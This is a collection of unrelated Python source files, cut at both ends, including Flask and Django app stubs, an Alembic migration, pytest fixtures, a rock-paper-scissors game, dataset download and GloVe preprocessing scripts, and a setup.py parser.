yaw_std,
]
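# Hedged usage sketch (illustrative; dr_list and usbl_list are lists of the
# auv_nav sensor objects used above, and sensors_std follows the dict layout
# read in DeadReckoningMovementModel.propagate):
#
#     results = run_particle_filter(
#         usbl_list, dr_list, num_particles=200, sensors_std=sensors_std,
#         dvl_noise_sigma_factor=1.0, imu_noise_sigma_factor=1.0,
#         usbl_noise_sigma_factor=1.0)
#     pf_list = results[0]   # best-particle trajectory as SyncedOrientationBodyVelocity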
|
"""docstring for run.py app import create_app."""
import os
from app import create_app
config_name = os.getenv("FLASK_ENV")
app = create_app(config_name)
if __name__ == "__main__":
app.run(threaded=True)
|
import math
from flask import url_for
from newsapp.models.article import Article
def pagination(category: str, number: int) -> dict:
page_count = Article.page_count(category)
out = {}
if number == 1:
out["prev"] = ""
out["labels"] = [
(i, url_for("main.news", category=category, number=i)) for i in range(1, 4)
]
out["next"] = url_for("main.news", category=category, number=number + 1)
elif number == page_count:
out["prev"] = url_for("main.news", category=category, number=number - 1)
out["labels"] = [
(i, url_for("main.news", category=category, number=i))
for i in range(number - 2, number + 1)
]
out["next"] = ""
else:
out["prev"] = url_for("main.news", category=category, number=number - 1)
out["labels"] = [
(i, url_for("main.news", category=category, number=i))
for i in range(number - 1, number + 2)
]
out["next"] = url_for("main.news", category=category, number=number + 1)
return out
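# Illustrative example (hypothetical URLs; url_for needs an application or
# request context and the actual paths depend on how "main.news" is routed):
#
#     pagination("tech", 1)
#     # -> {"prev": "",
#     #     "labels": [(1, "/news/tech/1"), (2, "/news/tech/2"), (3, "/news/tech/3")],
#     #     "next": "/news/tech/2"}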
|
"""database permission
Revision ID: 50db531bbf54
Revises: 822b8de2c260
Create Date: 2016-08-01 11:50:51.872278
"""
# revision identifiers, used by Alembic.
revision = '50db531bbf54'
down_revision = '822b8de2c260'
branch_labels = None
depends_on = None
from alembic import op
def upgrade():
op.execute("GRANT SELECT ON ALL TABLES IN SCHEMA public TO public;")
def downgrade():
pass
|
"""
This file is part of a simple toy neural network library.
Author: Marcel Moosbrugger
"""
import numpy as np
from simple_deep_learning.Layer import Layer
class OutputLayer(Layer):
def feed_forward(self, inputs):
self.last_inputs = inputs + self.biases
self.last_outputs = self.activation(self.last_inputs)
def get_outputs(self):
return self.last_outputs
# logistic activation function for output layer
def activation(self, x):
return 1 / (1 + np.exp(-x))
def dactivation(self, x):
return self.activation(x) * (1 - self.activation(x))
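# Worked example (illustrative): the logistic function maps 0 to 0.5 and its
# derivative sigma(x) * (1 - sigma(x)) peaks there, so for any OutputLayer
# instance `layer`, layer.activation(0.0) == 0.5 and layer.dactivation(0.0) == 0.25.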
|
import pytest
from .helpers import (
assert_equal_query,
PandasBackend,
SqlBackend,
CloudBackend,
BigqueryBackend,
data_frame
)
def pytest_addoption(parser):
parser.addoption(
"--dbs", action="store", default="sqlite", help="databases tested against (comma separated)"
)
params_backend = [
pytest.param(lambda: SqlBackend("postgresql"), id = "postgresql", marks=pytest.mark.postgresql),
pytest.param(lambda: SqlBackend("mysql"), id = "mysql", marks=pytest.mark.mysql),
pytest.param(lambda: SqlBackend("sqlite"), id = "sqlite", marks=pytest.mark.sqlite),
pytest.param(lambda: BigqueryBackend("bigquery"), id = "bigquery", marks=pytest.mark.bigquery),
pytest.param(lambda: CloudBackend("snowflake"), id = "snowflake", marks=pytest.mark.snowflake),
pytest.param(lambda: PandasBackend("pandas"), id = "pandas", marks=pytest.mark.pandas)
]
@pytest.fixture(params = params_backend, scope = "session")
def backend(request):
return request.param()
@pytest.fixture
def skip_backend(request, backend):
if request.node.get_closest_marker('skip_backend'):
mark_args = request.node.get_closest_marker('skip_backend').args
if backend.name in mark_args:
pytest.skip('skipped on backend: {}'.format(backend.name))
@pytest.fixture
def xfail_backend(request, backend):
if request.node.get_closest_marker('xfail_backend'):
mark_args = request.node.get_closest_marker('xfail_backend').args
if backend.name in mark_args:
pytest.xfail()
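# Usage sketch (illustrative): a test opts out of, or expects failure on,
# specific backends by naming them in the corresponding marker, e.g.
#
#     @pytest.mark.skip_backend("sqlite", "mysql")
#     def test_something(skip_backend, backend):
#         ...
#
# and analogously with @pytest.mark.xfail_backend("snowflake").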
|
import random
def play_game(choice):
choices = ["rock", "paper", "scissor"]
comp_choice = choices[random.randint(0,2)]
player_choice = str(choice).lower()
while True:
if player_choice == comp_choice:
print(f"Its a draw ..{player_choice} vs {comp_choice}!!")
return
elif player_choice == "rock" and comp_choice == "paper":
print(f"You lose...{player_choice} gets covered by {comp_choice}")
return
elif player_choice == "rock" and comp_choice == "scissor":
print(f"You win...{player_choice} smashes {comp_choice}")
return
elif player_choice == "scissor" and comp_choice == "paper":
print(f"You win...{player_choice} cuts {comp_choice}")
return
elif player_choice == "scissor" and comp_choice == "rock":
print(f"You lose...{player_choice} gets smashed by {comp_choice}")
return
elif player_choice == "paper" and comp_choice == "rock":
print(f"You win ...{player_choice} covers {comp_choice}")
return
elif player_choice == "paper" and comp_choice == "scissor":
print(f"You lose...{player_choice} gets cut by {comp_choice}")
return
        else:
            print("Please enter rock, paper, or scissor")
            return
def main():
choice = str(input("Choose rock, paper, or scissor: "))
play_game(choice)
play_again = True
while play_again:
play_again_input = input("Do you want to play again (y/n)? ").lower()
while play_again_input not in ("y", "n"):
play_again_input = input("Invalid Answer, Please Type 'y' or 'n'? ").lower()
if play_again_input == "n":
print("OK ...BYE BYE!!")
return
else:
            main()
if __name__ == "__main__":
main()
# # guess the number
# import random
# def play_game(max_number):
# random_number = random.randint(0, max_number)
# guess = int(input(f"Guess A Number Between 0 and {max_number}: "))
# count = 1
# while True:
# if guess > random_number:
# guess = int(input("Too High! Guess Again: "))
# count += 1
# elif guess < random_number:
# guess = int(input("Too Low! Guess Again: "))
# count += 1
# else:
# print(f"You Got It In {count} Guesses!")
# return count
# def main():
# guesses = []
# play_again = True
# while play_again:
# max_number = int(input("Pick a max number: "))
# guesses.append(play_game(max_number))
# play_again_input = input("Do you want to play again (y/n)? ").lower()
# while play_again_input not in ("y", "n"):
# play_again_input = input("Invalid Answer, Please Type 'y' or 'n'? ").lower()
# if play_again_input == "n":
# print(f"The Max Number Of Guesses Was: {max(guesses)}")
# print(f"The Min Number Of Guesses Was: {min(guesses)}")
# print(f"The Average Number Of Guesses Was: {sum(guesses)/len(guesses)}")
# return
# else:
# continue
# if __name__ == "__main__":
# main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import, division
"""
Copyright (c) 2011, Kenneth Reitz <me@kennethreitz.com>
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
clint.textui.progress
~~~~~~~~~~~~~~~~~~~~~
Progress-bar functionality adapted from clint.textui.progress, used here to
download and extract the datasets listed in datasets.yml.
"""
from collections import OrderedDict
from os import path
import glob
import os
import sys
import tarfile
import time
import zipfile
import yaml
try:
import requests
except ImportError:
print('this download script requires the requests module: conda install requests')
sys.exit(1)
STREAM = sys.stderr
BAR_TEMPLATE = '%s[%s%s] %i/%i - %s\r'
MILL_TEMPLATE = '%s %s %i/%i\r'
DOTS_CHAR = '.'
BAR_FILLED_CHAR = '#'
BAR_EMPTY_CHAR = ' '
MILL_CHARS = ['|', '/', '-', '\\']
# How long to wait before recalculating the ETA
ETA_INTERVAL = 1
# How many intervals (excluding the current one) to calculate the simple moving
# average
ETA_SMA_WINDOW = 9
class Bar(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
return False # we're not suppressing exceptions
def __init__(self, label='', width=32, hide=None, empty_char=BAR_EMPTY_CHAR,
filled_char=BAR_FILLED_CHAR, expected_size=None, every=1):
'''Bar is a class for printing the status of downloads'''
self.label = label
self.width = width
self.hide = hide
# Only show bar in terminals by default (better for piping, logging etc.)
if hide is None:
try:
self.hide = not STREAM.isatty()
except AttributeError: # output does not support isatty()
self.hide = True
self.empty_char = empty_char
self.filled_char = filled_char
self.expected_size = expected_size
self.every = every
self.start = time.time()
self.ittimes = []
self.eta = 0
self.etadelta = time.time()
self.etadisp = self.format_time(self.eta)
self.last_progress = 0
if (self.expected_size):
self.show(0)
def show(self, progress, count=None):
if count is not None:
self.expected_size = count
if self.expected_size is None:
raise Exception("expected_size not initialized")
self.last_progress = progress
if (time.time() - self.etadelta) > ETA_INTERVAL:
self.etadelta = time.time()
self.ittimes = \
self.ittimes[-ETA_SMA_WINDOW:] + \
[-(self.start - time.time()) / (progress+1)]
self.eta = \
sum(self.ittimes) / float(len(self.ittimes)) * \
(self.expected_size - progress)
self.etadisp = self.format_time(self.eta)
x = int(self.width * progress / self.expected_size)
if not self.hide:
if ((progress % self.every) == 0 or # True every "every" updates
(progress == self.expected_size)): # And when we're done
STREAM.write(BAR_TEMPLATE % (
self.label, self.filled_char * x,
self.empty_char * (self.width - x), progress,
self.expected_size, self.etadisp))
STREAM.flush()
def done(self):
self.elapsed = time.time() - self.start
elapsed_disp = self.format_time(self.elapsed)
if not self.hide:
# Print completed bar with elapsed time
STREAM.write(BAR_TEMPLATE % (
self.label, self.filled_char * self.width,
self.empty_char * 0, self.last_progress,
self.expected_size, elapsed_disp))
STREAM.write('\n')
STREAM.flush()
def format_time(self, seconds):
return time.strftime('%H:%M:%S', time.gmtime(seconds))
def bar(it, label='', width=32, hide=None, empty_char=BAR_EMPTY_CHAR,
filled_char=BAR_FILLED_CHAR, expected_size=None, every=1):
"""Progress iterator. Wrap your iterables with it."""
count = len(it) if expected_size is None else expected_size
    with Bar(label=label, width=width, hide=hide, empty_char=empty_char,
             filled_char=filled_char, expected_size=count, every=every) \
            as bar:
for i, item in enumerate(it):
yield item
bar.show(i + 1)
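# Minimal usage sketch (illustrative): wrapping any sized iterable prints a
# textual progress bar to stderr, e.g.
#
#     for _ in bar(range(50), label='demo '):
#         time.sleep(0.01)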
def ordered_load(stream, Loader=yaml.Loader, object_pairs_hook=OrderedDict):
class OrderedLoader(Loader):
pass
def construct_mapping(loader, node):
loader.flatten_mapping(node)
return object_pairs_hook(loader.construct_pairs(node))
OrderedLoader.add_constructor(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
construct_mapping)
return yaml.load(stream, OrderedLoader)
class DirectoryContext(object):
"""
Context Manager for changing directories
"""
def __init__(self, path):
self.old_dir = os.getcwd()
self.new_dir = path
def __enter__(self):
os.chdir(self.new_dir)
def __exit__(self, *args):
os.chdir(self.old_dir)
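# Usage sketch: temporarily run code in another directory and return to the
# original working directory afterwards, even if an exception is raised.
#
#     with DirectoryContext('/tmp'):
#         ...  # relative paths here resolve against /tmp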
def _url_to_binary_write(url, output_path, title):
    '''Download the contents of url to output_path in binary mode,
    showing a progress bar labelled with the given title. Any partially
    written file is removed if the download fails.'''
print('Downloading {0}'.format(title))
resp = requests.get(url, stream=True)
try:
with open(output_path, 'wb') as f:
            total_length = int(resp.headers.get('content-length', 0))
for chunk in bar(resp.iter_content(chunk_size=1024), expected_size=(total_length/1024) + 1, every=1000):
if chunk:
f.write(chunk)
f.flush()
except:
# Don't leave a half-written zip file
if path.exists(output_path):
os.remove(output_path)
raise
def _extract_downloaded_archive(output_path):
'''Extract a local archive, e.g. zip or tar, then
delete the archive'''
if output_path.endswith("tar.gz"):
with tarfile.open(output_path, "r:gz") as tar:
tar.extractall()
os.remove(output_path)
elif output_path.endswith("tar"):
with tarfile.open(output_path, "r:") as tar:
tar.extractall()
os.remove(output_path)
elif output_path.endswith("tar.bz2"):
with tarfile.open(output_path, "r:bz2") as tar:
tar.extractall()
os.remove(output_path)
elif output_path.endswith("zip"):
with zipfile.ZipFile(output_path, 'r') as zipf:
zipf.extractall()
os.remove(output_path)
def _process_dataset(dataset, output_dir, here):
    '''Process one download spec from datasets.yml.
    Each dataset entry typically has "title", "url" and "files" keys
    describing local files that must be present, either downloaded
    directly or extracted from an archive fetched from the url.
    If the url ends with '/', each file name is appended to the url
    to build the individual download links (see the commented example
    after this function).
    '''
if not path.exists(output_dir):
os.makedirs(output_dir)
with DirectoryContext(output_dir):
requires_download = False
for f in dataset.get('files', []):
if not path.exists(f):
requires_download = True
break
if not requires_download:
print('Skipping {0}'.format(dataset['title']))
return
url = dataset['url']
title_fmt = dataset['title'] + ' {} of {}'
if url.endswith('/'):
urls = [url + f for f in dataset['files']]
output_paths = [os.path.join(here, 'data', fname)
for fname in dataset['files']]
unpacked = ['.'.join(output_path.split('.')[:(-2 if output_path.endswith('gz') else -1)]) + '*'
for output_path in output_paths]
else:
urls = [url]
output_paths = [path.split(url)[1]]
unpacked = dataset['files']
if not isinstance(unpacked, (tuple, list)):
unpacked = [unpacked]
zipped = zip(urls, output_paths, unpacked)
for idx, (url, output_path, unpack) in enumerate(zipped):
running_title = title_fmt.format(idx + 1, len(urls))
if glob.glob(unpack) or os.path.exists(unpack.replace('*','')):
# Skip a file if a similar one is downloaded:
# i.e. one that has same name but dif't extension
print('Skipping {0}'.format(running_title))
continue
_url_to_binary_write(url, output_path, running_title)
_extract_downloaded_archive(output_path)
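# Illustrative datasets.yml fragment (topic, title, URL and file names are
# hypothetical). Each topic maps to a list of download specs; a trailing '/'
# on the url means every entry in "files" is appended to it:
#
#     census:
#       - title: Example census data
#         url: http://example.com/data/
#         files:
#           - people.csv.gz
#           - households.csv.gz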
def main():
'''Download each dataset specified by datasets.yml in this directory'''
here = path.abspath(path.join(path.split(__file__)[0]))
info_file = path.join(here, 'datasets.yml')
with open(info_file) as f:
info = ordered_load(f.read())
for topic, downloads in info.items():
output_dir = path.join(here, topic)
for d in downloads:
_process_dataset(d, output_dir, here)
if __name__ == '__main__':
main()
|
import asyncio
import pathlib
import pytest
@pytest.fixture
def examples_dir(request):
return pathlib.Path(request.config.rootdir) / "examples"
async def run_example(examples_dir, example_file):
"""
Run example and yield output line by line.
"""
proc = await asyncio.create_subprocess_exec(
"python",
str(examples_dir / example_file),
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.STDOUT,
)
while True:
data = await proc.stdout.readline()
if data == b"":
break
line = data.decode("ascii").rstrip()
yield line
async def run_example_until(examples_dir, example_file, predicate_fn):
"""
    Run an example until its output satisfies the given success predicate.
"""
seen = []
    # Passed to the predicate so lambdas can easily check for a substring in the output seen so far
def contains_substring(word):
return any(word in x for x in seen)
async for line in run_example(examples_dir, example_file):
seen.append(line)
if predicate_fn(seen, contains_substring):
break
assert predicate_fn(seen, contains_substring)
@pytest.mark.asyncio
@pytest.mark.timeout(3)
async def test_request_example(examples_dir):
await run_example_until(
examples_dir,
"request_api.py",
lambda lines, contains: contains("Requesting")
and contains("Got answer: Yay")
and len(lines) >= 6,
)
@pytest.mark.asyncio
@pytest.mark.timeout(5)
async def test_inter_process_ping_pong_example(examples_dir):
await run_example_until(
examples_dir,
"inter_process_ping_pong.py",
lambda lines, contains: contains("Hello from proc1")
and contains("Hello from proc2")
and contains("Received via SUBSCRIBE API in proc2")
and contains("Received via SUBSCRIBE API in proc1")
and contains("Received via STREAM API in proc2"),
)
|
"""
Build an Elasticsearch index template from a JSON schema file.
"""
import json
import logging
import sys
logger = logging.getLogger(__name__)
def _get_template(schema, args):
# mapping = {
# field: {'type': 'keyword'}
# for field in set(f for v in schema.values() for f in v.get('args', {}).keys()
# | set(['id', 'year', 'nuts_level', 'fact_key']))
# }
# if args.fulltext:
# mapping['fulltext_suggest'] = {
# 'type': 'completion'
# }
# mapping['fulltext_suggest_context'] = {
# 'type': 'completion',
# 'contexts': [{
# 'name': 'suggest_context',
# 'type': 'category'
# }]
# }
return {
'index_patterns': [args.index_pattern],
'mappings': {
'properties': {**{
field: {'type': 'keyword'} for field in set(
dimension for statistic in schema.values()
for measure in statistic.get('measures', {}).values()
for dimension in measure.get('dimensions', {}).keys()
) | set(['region_id', 'nuts', 'lau', 'cube', 'statistic'])
}, **{'path': {'type': 'object'}, 'year': {'type': 'short'}}}
},
'settings': {
'index.mapping.total_fields.limit': 100000,
'index.number_of_shards': args.shards,
'index.number_of_replicas': args.replicas
}
}
def main(args):
with open(args.schema) as f:
schema = json.load(f)
sys.stdout.write(json.dumps(_get_template(schema, args), indent=2))
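# Usage sketch (hypothetical; the real argument parsing lives in the calling
# script). main() only needs an object exposing schema, index_pattern, shards
# and replicas attributes:
#
#     from argparse import Namespace
#     main(Namespace(schema='schema.json', index_pattern='mydata-*',
#                    shards=1, replicas=1))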
|
import shutil
import sys
from argparse import ArgumentParser
from collections import Counter
from pathlib import Path
from zipfile import ZipFile
import numpy as np
import pandas as pd
import requests
from src.config import CONTEXT_SIZE, COVERAGE, DATA_DIR, TEXT8_URL, VOCAB_SIZE
from src.utils.logger import get_logger
logger = get_logger(__name__)
def download_data(url=TEXT8_URL, dest_dir=DATA_DIR):
# prepare destination
dest = Path(dest_dir) / Path(url).name
dest.parent.mkdir(parents=True, exist_ok=True)
    # download zip
if not dest.exists():
logger.info("downloading file: %s.", url)
r = requests.get(url, stream=True)
with dest.open("wb") as f:
shutil.copyfileobj(r.raw, f)
logger.info("file downloaded: %s.", dest)
# extract zip
if not Path(dest_dir, "text8").exists():
with dest.open("rb") as f, ZipFile(f, "r") as zf:
zf.extractall(dest_dir)
logger.info("file extracted.")
def load_data(src_dir=DATA_DIR):
file_path = Path(src_dir, "text8")
with open(file_path) as f:
text8 = f.read()
logger.info("file loaded: %s.", file_path)
return text8
def process_data(text8, vocab_size=VOCAB_SIZE, coverage=COVERAGE, context_size=CONTEXT_SIZE):
text8_tokens = text8.split()
# create vocab
df_vocab = create_vocabulary(text8_tokens, vocab_size, coverage)
vocab_size, _ = df_vocab.shape
logger.info("vocab created, size: %s.", vocab_size)
# compute interaction
df_interaction = create_interaction_dataframe(text8_tokens, df_vocab, context_size)
df_interaction = create_glove_dataframe(df_interaction)
return {"vocabulary": df_vocab, "interaction": df_interaction}
def create_vocabulary(text_tokens, vocab_size=VOCAB_SIZE, coverage=COVERAGE):
tokens_counter = Counter(text_tokens)
# find cumulative proportion of token counts
counts = np.sort(list(tokens_counter.values()))[::-1]
total = np.sum(counts)
counts_cumprop = np.cumsum(counts) / total
# get count with defined coverage of total tokens
count_cutoff = counts[np.searchsorted(counts_cumprop, coverage)]
logger.info("count cufoff: %s; token coverage: %s.", count_cutoff, coverage)
# get vocab and counts
vocab = [token for token, count in tokens_counter.most_common(vocab_size) if count >= count_cutoff]
vocab_counts = [tokens_counter[token] for token in vocab]
unk_count = total - np.sum(vocab_counts)
df_vocab = pd.DataFrame({"token": ["<UNK>"] + vocab, "count": [unk_count] + vocab_counts})
df_vocab["proportion"] = df_vocab["count"] / total
df_vocab = df_vocab.sort_values("count", ascending=False).reset_index(drop=True)
return df_vocab
def create_interaction_dataframe(text_tokens, df_vocab, context_size=CONTEXT_SIZE):
token2id = {token: i for i, token in enumerate(df_vocab["token"])}
token_ids = (token2id.get(token, 0) for token in text_tokens)
df = pd.DataFrame(list(enumerate(token_ids)), columns=["position", "token_id"])
# cross join by position for right context only
df_concat = pd.concat([df.set_index(df["position"] + i + 1) for i in range(context_size)])
df_co = df_concat.join(df, how="inner", lsuffix="_row", rsuffix="_col")
df_co = df_co.loc[(df_co["token_id_row"] != df_co["token_id_col"]) &
(df_co["position_row"] < df_co["position_col"]), :]
df_co = df_co.assign(**{"value": 1 / (df_co["position_col"] - df_co["position_row"])})
# aggregate interactions
df_agg = (df_co.groupby(["token_id_row", "token_id_col"])["value"]
.agg(["count", "sum"])
.reset_index()
.rename(columns={"token_id_row": "row_token_id", "token_id_col": "col_token_id", "sum": "value"}))
df_agg = df_agg.loc[(df_agg["count"] != 0) & (df_agg["value"] != 0), :]
# union swap row and col since symmetric
dfs_agg = [df_agg, df_agg.rename(columns={"row_token_id": "col_token_id", "col_token_id": "row_token_id"})]
df_agg = (pd.concat(dfs_agg, sort=False)
.groupby(["row_token_id", "col_token_id"])
.sum()
.reset_index())
# get vocab info
df_agg["row_token"] = df_vocab["token"].to_numpy()[df_agg["row_token_id"]]
df_agg["col_token"] = df_vocab["token"].to_numpy()[df_agg["col_token_id"]]
df_agg = (df_agg.join(df_vocab.set_index("token"), on="row_token", rsuffix="_row")
.join(df_vocab.set_index("token"), on="col_token", rsuffix="_col"))
df_agg["neg_weight"] = df_agg["count_row"] * df_agg["proportion_col"]
df_agg = df_agg.drop(columns=["count_row", "proportion", "count_col", "proportion_col"])
# randomise dataframe
hashes = (df_agg["row_token"]
.str.cat(df_agg["col_token"], sep=" ")
.str.encode("utf8")
.apply(hash))
df_agg = df_agg.set_index(hashes).sort_index()
logger.info("interaction dataframe created.")
logger.info("dataframe shape: %s.", df_agg.shape)
return df_agg
def create_glove_dataframe(df, count_minimum=10):
# apply glove transformation
df = df[df["count"] >= count_minimum].copy()
df["glove_weight"] = glove_weight(df["count"])
df["glove_value"] = np.log(df["value"])
logger.info("dataframe shape: %s.", df.shape)
return df
def glove_weight(values, alpha=0.75, x_max=100):
return np.clip(np.power(values / x_max, alpha), 0, 1)
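# Worked example of the GloVe weighting f(x) = min((x / x_max) ** alpha, 1):
# with the defaults alpha=0.75 and x_max=100, a co-occurrence value of 10
# gives (10 / 100) ** 0.75 ≈ 0.178, while any value >= 100 is clipped to 1.0.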
def save_data(data, save_dir=DATA_DIR):
# save vocab
df_vocab = data["vocabulary"]
csv_path = Path(save_dir, "vocab.csv")
df_vocab.to_csv(csv_path, index=False)
logger.info("vocabulary dataframe saved: %s.", csv_path)
txt_path = Path(save_dir, "vocab.txt")
txt_path.write_text("\n".join(df_vocab["token"]))
logger.info("vocabulary saved: %s.", txt_path)
# save interaction
df_interaction = data["interaction"]
csv_path = Path(save_dir, "interaction.csv")
df_interaction.to_csv(csv_path, index=False)
logger.info("interaction dataframe saved: %s.", csv_path)
return data
def main(url, dest, vocab_size, coverage, context_size, **kwargs):
download_data(url, dest)
text8 = load_data(dest)
data = process_data(text8, vocab_size, coverage, context_size)
save_data(data, dest)
if __name__ == "__main__":
parser = ArgumentParser(description="Download, extract and prepare text8 data.")
parser.add_argument(
"--url",
default=TEXT8_URL,
help="url of text8 data (default: %(default)s)"
)
parser.add_argument(
"--dest",
default=DATA_DIR,
help="destination directory for downloaded and extracted files (default: %(default)s)"
)
parser.add_argument(
"--vocab-size",
default=VOCAB_SIZE,
help="maximum size of vocab (default: %(default)s)"
)
parser.add_argument(
"--coverage",
type=float,
default=COVERAGE,
help="token coverage to set token count cutoff (default: %(default)s)"
)
parser.add_argument(
"--context-size",
type=int,
default=CONTEXT_SIZE,
help="size of context window (default: %(default)s)"
)
args = parser.parse_args()
logger.info("call: %s.", " ".join(sys.argv), extra={"ArgumentParser": args.__dict__})
logger.info("ArgumentParser: %s.", args.__dict__)
try:
main(**args.__dict__)
except KeyboardInterrupt:
pass
except Exception as e:
logger.exception(e)
raise e
|
from django.apps import AppConfig
class learnConfig(AppConfig):
name = "learn"
verbose_name = "learn"
|
from __future__ import annotations
import ast
from configparser import ConfigParser
from pathlib import Path
from typing import Any
from poetry.core.semver.version import Version
class SetupReader:
"""
    Class that reads setup.py and setup.cfg files without executing them.
"""
DEFAULT: dict[str, Any] = {
"name": None,
"version": None,
"install_requires": [],
"extras_require": {},
"python_requires": None,
}
FILES = ["setup.py", "setup.cfg"]
@classmethod
def read_from_directory(cls, directory: str | Path) -> dict[str, Any]:
if isinstance(directory, str):
directory = Path(directory)
result = cls.DEFAULT.copy()
for filename in cls.FILES:
filepath = directory / filename
if not filepath.exists():
continue
read_file_func = getattr(cls(), "read_" + filename.replace(".", "_"))
new_result = read_file_func(filepath)
for key in result.keys():
if new_result[key]:
result[key] = new_result[key]
return result
def read_setup_py(self, filepath: str | Path) -> dict[str, Any]:
if isinstance(filepath, str):
filepath = Path(filepath)
with filepath.open(encoding="utf-8") as f:
content = f.read()
result: dict[str, Any] = {}
body = ast.parse(content).body
setup_call = self._find_setup_call(body)
if setup_call is None:
return self.DEFAULT
# Inspecting keyword arguments
call, body = setup_call
result["name"] = self._find_single_string(call, body, "name")
result["version"] = self._find_single_string(call, body, "version")
result["install_requires"] = self._find_install_requires(call, body)
result["extras_require"] = self._find_extras_require(call, body)
result["python_requires"] = self._find_single_string(
call, body, "python_requires"
)
return result
def read_setup_cfg(self, filepath: str | Path) -> dict[str, Any]:
parser = ConfigParser()
parser.read(str(filepath))
name = None
version = None
if parser.has_option("metadata", "name"):
name = parser.get("metadata", "name")
if parser.has_option("metadata", "version"):
version = Version.parse(parser.get("metadata", "version")).text
install_requires = []
extras_require: dict[str, list[str]] = {}
python_requires = None
if parser.has_section("options"):
if parser.has_option("options", "install_requires"):
for dep in parser.get("options", "install_requires").split("\n"):
dep = dep.strip()
if not dep:
continue
install_requires.append(dep)
if parser.has_option("options", "python_requires"):
python_requires = parser.get("options", "python_requires")
if parser.has_section("options.extras_require"):
for group in parser.options("options.extras_require"):
extras_require[group] = []
deps = parser.get("options.extras_require", group)
for dep in deps.split("\n"):
dep = dep.strip()
if not dep:
continue
extras_require[group].append(dep)
return {
"name": name,
"version": version,
"install_requires": install_requires,
"extras_require": extras_require,
"python_requires": python_requires,
}
def _find_setup_call(
self, elements: list[ast.stmt]
) -> tuple[ast.Call, list[ast.stmt]] | None:
funcdefs: list[ast.stmt] = []
for i, element in enumerate(elements):
if isinstance(element, ast.If) and i == len(elements) - 1:
# Checking if the last element is an if statement
# and if it is 'if __name__ == "__main__"' which
# could contain the call to setup()
test = element.test
if not isinstance(test, ast.Compare):
continue
left = test.left
if not isinstance(left, ast.Name):
continue
if left.id != "__name__":
continue
setup_call = self._find_sub_setup_call([element])
if setup_call is None:
continue
call, body = setup_call
return call, body + elements
if not isinstance(element, ast.Expr):
if isinstance(element, ast.FunctionDef):
funcdefs.append(element)
continue
value = element.value
if not isinstance(value, ast.Call):
continue
func = value.func
if not (isinstance(func, ast.Name) and func.id == "setup") and not (
isinstance(func, ast.Attribute)
and getattr(func.value, "id", None) == "setuptools"
and func.attr == "setup"
):
continue
return value, elements
# Nothing, we inspect the function definitions
return self._find_sub_setup_call(funcdefs)
def _find_sub_setup_call(
self, elements: list[ast.stmt]
) -> tuple[ast.Call, list[ast.stmt]] | None:
for element in elements:
if not isinstance(element, (ast.FunctionDef, ast.If)):
continue
setup_call = self._find_setup_call(element.body)
if setup_call is not None:
sub_call, body = setup_call
body = elements + body
return sub_call, body
return None
def _find_install_requires(self, call: ast.Call, body: list[ast.stmt]) -> list[str]:
install_requires: list[str] = []
value = self._find_in_call(call, "install_requires")
if value is None:
# Trying to find in kwargs
kwargs = self._find_call_kwargs(call)
if kwargs is None or not isinstance(kwargs, ast.Name):
return install_requires
variable = self._find_variable_in_body(body, kwargs.id)
if not isinstance(variable, (ast.Dict, ast.Call)):
return install_requires
if isinstance(variable, ast.Call):
if not isinstance(variable.func, ast.Name):
return install_requires
if variable.func.id != "dict":
return install_requires
value = self._find_in_call(variable, "install_requires")
else:
value = self._find_in_dict(variable, "install_requires")
if value is None:
return install_requires
if isinstance(value, ast.List):
for el in value.elts:
if isinstance(el, ast.Str):
install_requires.append(el.s)
elif isinstance(value, ast.Name):
variable = self._find_variable_in_body(body, value.id)
if variable is not None and isinstance(variable, ast.List):
for el in variable.elts:
if isinstance(el, ast.Str):
install_requires.append(el.s)
return install_requires
def _find_extras_require(
self, call: ast.Call, body: list[ast.stmt]
) -> dict[str, list[str]]:
extras_require: dict[str, list[str]] = {}
value = self._find_in_call(call, "extras_require")
if value is None:
# Trying to find in kwargs
kwargs = self._find_call_kwargs(call)
if kwargs is None or not isinstance(kwargs, ast.Name):
return extras_require
variable = self._find_variable_in_body(body, kwargs.id)
if not isinstance(variable, (ast.Dict, ast.Call)):
return extras_require
if isinstance(variable, ast.Call):
if not isinstance(variable.func, ast.Name):
return extras_require
if variable.func.id != "dict":
return extras_require
value = self._find_in_call(variable, "extras_require")
else:
value = self._find_in_dict(variable, "extras_require")
if value is None:
return extras_require
if isinstance(value, ast.Dict):
val: ast.expr | None
for key, val in zip(value.keys, value.values):
if not isinstance(key, ast.Str):
continue
if isinstance(val, ast.Name):
val = self._find_variable_in_body(body, val.id)
if isinstance(val, ast.List):
extras_require[key.s] = [
e.s for e in val.elts if isinstance(e, ast.Str)
]
elif isinstance(value, ast.Name):
variable = self._find_variable_in_body(body, value.id)
if variable is None or not isinstance(variable, ast.Dict):
return extras_require
for key, val in zip(variable.keys, variable.values):
if not isinstance(key, ast.Str):
continue
if isinstance(val, ast.Name):
val = self._find_variable_in_body(body, val.id)
if isinstance(val, ast.List):
extras_require[key.s] = [
e.s for e in val.elts if isinstance(e, ast.Str)
]
return extras_require
def _find_single_string(
self, call: ast.Call, body: list[ast.stmt], name: str
) -> str | None:
value = self._find_in_call(call, name)
if value is None:
# Trying to find in kwargs
kwargs = self._find_call_kwargs(call)
if kwargs is None or not isinstance(kwargs, ast.Name):
return None
variable = self._find_variable_in_body(body, kwargs.id)
if not isinstance(variable, (ast.Dict, ast.Call)):
return None
if isinstance(variable, ast.Call):
if not isinstance(variable.func, ast.Name):
return None
if variable.func.id != "dict":
return None
value = self._find_in_call(variable, name)
else:
value = self._find_in_dict(variable, name)
if value is None:
return None
if isinstance(value, ast.Str):
